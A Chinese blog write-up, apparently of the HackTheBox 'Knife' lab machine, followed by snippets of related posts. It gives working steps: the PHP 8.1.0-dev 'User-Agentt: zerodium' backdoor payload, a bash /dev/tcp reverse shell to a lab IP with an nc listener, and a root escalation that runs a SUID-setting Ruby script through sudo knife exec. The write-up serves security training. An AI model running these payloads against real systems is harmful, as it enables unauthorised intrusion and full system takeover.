HackTheBox-Knife靶场实战

最新推荐文章于 2022-11-08 16:31:48 发布
最新推荐文章于 2022-11-08 16:31:48 发布
阅读量597 收藏
点赞数
文章标签: python linux java centos shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36584013/article/details/117315844
版权

HackTheBox-Knife靶场实战

靶场信息

 

 信息搜集

首先使用nmap进行端口扫描

我们得知开启了22和80端口

出于能不爆破就不爆破的原则,先访问80端口看一下

80端口上的内容有点不明所以。

在完全没思路的情况下,尝试使用dirbuster工具进行了目录爆破,但四十分钟过去了却没有一丁点收获,连robots.txt页面也不存在。

我的思路就卡在这里了,一时之间不知道应该怎么做,就去泡了杯茶,突然来了灵感,要不先抓个包看看?

乍一看似乎没有什么值得关注的东西,但在通宵日靶场导致神志不清又经过了茶叶洗礼的脑瓜子的引导下,我注意到了一个点。

X-Powered-By: PHP/8.1.0-dev

这东西,隐约之间觉得不简单,便去百度进行了搜索。搜索的同时尝试了nikto工具,也提示了这一条

就是这两个提示,让我确信突破口在这,然后经过大量的google和百度搜索后,找到了一丝思路。

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。

漏洞利用

使用burp抓包,并加入字段

User-Agentt: zerodiumvar_dump(2*3);

发现被成功执行

接着尝试命令是否可被解析执行

User-Agentt: zerodiumsystem("id");

Nice 命令可被执行,那就简单了,可以执行命令,那就尝试getshell吧

本地监听:

Nc –nvlp 9001

执行命令:

User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.240/9001 0>&1'");

成功通过nc获得了一个shell

首先确定是否有python

Which python3

确定python3存在,使用python3获得一个更加稳定的shell程序

python3 -c 'import pty; pty.spawn("/bin/bash")'

成功获得普通用户的flag

漏洞提权

先确定knife用户的sudo权限

Sudo –l

Ls –al /usr/bin/knife

进行提权

echo "system('chmod +s /bin/bash')" > exploit.rb

ls

sudo /usr/bin/knife exec exploit.rb

ls -al /bin/bash

/bin/bash –p

获得root用户的flag

xyongsec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HackTheBox-Knife
LYJ20010728的博客
08-22 252
HackTheBox-Knife连接配置信息搜集渗透测试漏洞挖掘getshell提取 连接配置 参考之前的文章步骤配置 LAB ACCESS,文章链接 信息搜集 先用 Namp 扫描一下目标靶机,发现开放了 22、80 两个端口 sudo nmap 10.10.10.242 用 dirb 扫描网站发现没有什么有用信息 渗透测试 漏洞挖掘 联想到题目名字应该是存在后门,查看源码和抓包分析后发现存在 PHP/8.1.0-dev,该版本在2021年3月28日被植入后门,当服务器存在
SpringBoot整合knife4j(快速入门超详细版)
最新发布
weixin_47316183的博客
08-01 2万+
在日常开发中,写接口文档是我们必不可少的,而Knife4j就是一个接口文档工具,可以看作是Swagger的升级版,但是界面比Swagger更好看,功能更丰富早期,swagger-boostrap-ui是1.x版本,如今swagger-bootsrap-ui到2.x,同时也更改名字Knife4j,适用于单体和微服务项目。怎么样,是不是特别的方便和简单~
php-8.1.0 开发版后门复现
lionwerson的博客
06-02 596
1
PHP 8.1.0-dev 开发版本后门事件
EC_Carrot的博客
07-18 478
漏洞背景 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 漏洞复现 发送如下数据包,可见代码var_dump(233*233);成功执行: GET / HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0
113-springboot-demo-knife4j-v3.rar
03-07
本质是Swagger的增强解决方案,前身只是一个SwaggerUI(swagger-bootstrap-ui)Knife4j是为Java MVC框架集成Swagger生成Api文档的增强解决方案, 前身是swagger-bootstrap-ui,取名kni4j是希望她能像一把匕首一样小巧,...
esi-knife:ESI刀
04-27
.knife文件不应以任何方式被视为防篡改。 如果您要与另一方共享结果,则唯一可信任的方式是通过Web部署。 大公司考虑请自己经营。 这是自托管的,请不要占用我的带宽。 这是官员吗? 否。绝不是任何形状或形式。 ...
113-springboot-demo-knife4j-v2.rar
03-07
本质是Swagger的增强解决方案,前身只是一个SwaggerUI(swagger-bootstrap-ui)Knife4j是为Java MVC框架集成Swagger生成Api文档的增强解决方案, 前身是swagger-bootstrap-ui,取名kni4j是希望她能像一把匕首一样小巧,...
cloud-nacos-gateway-knife4j:swagger聚合文档!使用技术为:Spring cloud + nacos + gateway + knife4j
03-08
春云+ nacos +网关+ knife4j 这是一个微服务聚合文档 项目文档访问地址: 什么是knife4j? knife4j就是swagger的升级版,除了美化了swagger的界面。而且还有其他的增强功能 增强功能有哪些? 标签分组标签排序,...
springboot-knife4j 实现API文档
09-05
本项目以"springboot-knife4j 实现API文档"为主题,旨在帮助Spring Boot开发者更便捷地创建高质量的API文档,提高开发效率和协作体验。 Spring Boot是一款快速构建微服务应用的框架,它简化了Spring的配置和使用,...
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 897
vulhub漏洞复现练习篇
Hack the Box Knife 靶机渗透
Shadow的博客
07-23 255
Knife靶机渗透 目标:得到root权限,取得user.txt,root.txt 作者:shadow 时间:2021-07-23 请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 Nikto查看漏洞,发现php版本8.1.0 查找是否有已知漏洞exploit PHP 8.1.0-dev版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通..
Hackthebox初体验
leoriclee的博客
05-08 1290
在kali下装置这几个源 apt-get install network-manager-openvpn apt-get install network-manager-openvpn-gnome apt-get install network-manager-pptp apt-get install network-manager-pptp-gnome apt-get install netwo...
Hack the box knife
qq_41696858的博客
07-15 146
1.nmap -sC -sV 10.10.10.242 //常规扫 22,80端口 2.wappalyzer扫指纹 注意到PHP版本是8.1.0-dev 这个版本的PHP最近被爆出来存在远程代码执行漏洞 具体看这个:https://zhuanlan.zhihu.com/p/381142917 直接上payload User-Agentt: zerodiumsystem("/bin/bash -c ‘bash -i >&/dev/tcp/10.10.14.113/6666 0>&1
Knife4j 搭建使用
coderWang
11-08 413
Knife4j
PHP-8.1.0-dev 后门命令执行漏洞复现
m0_48520508的博客
06-16 2124
0x00漏洞描述 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 0x01影响范围 PHP 8.1.0-dev 0x02环境搭建 1、本次环境搭建使用vulhub中的docker环境搭建,vulhub环境下载地址: https://github.com/vulhub/vulhub 2、下载完成后发送到安装有docker和docker-compose环境的虚拟机中,进入漏洞环境目录 c
php漏洞
臭nana的博客
12-12 235
在PHP中,MD5,sha1是不能处理数组的,md5(数组)会返回null,所以md5(a[])==null,md5(b[])==null,md5(a[])=md5(b[])=null. http://ctf5.shiyanbar.com/web/false.php?name[]=a&password[]=b PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把...
PHP 8.1.0-dev后门复现
weixin_46137328的博客
01-18 1746
0x01 简介PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来...
PHP zerodium后门漏洞
课嗨教育的专栏
04-27 864
漏洞类型 任意代码执行 触发条件 提交的请求包中,如果字符串以'zerodium'开头,那么该行将从useragent HTTP标头(“ HTTP_USER_AGENTT”)中执行PHP代码
cloud-nacos-gateway-knife4j:swagger聚合文档!使用技术为:spring cloud + nac...
07-15
综上所述,cloud-nacos-gateway-knife4j:swagger聚合文档使用了Spring Cloud、Nacos、Gateway和Knife4j等技术,通过Spring Cloud构建和管理微服务,使用Nacos实现服务注册与发现,通过Gateway实现统一的请求分发和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值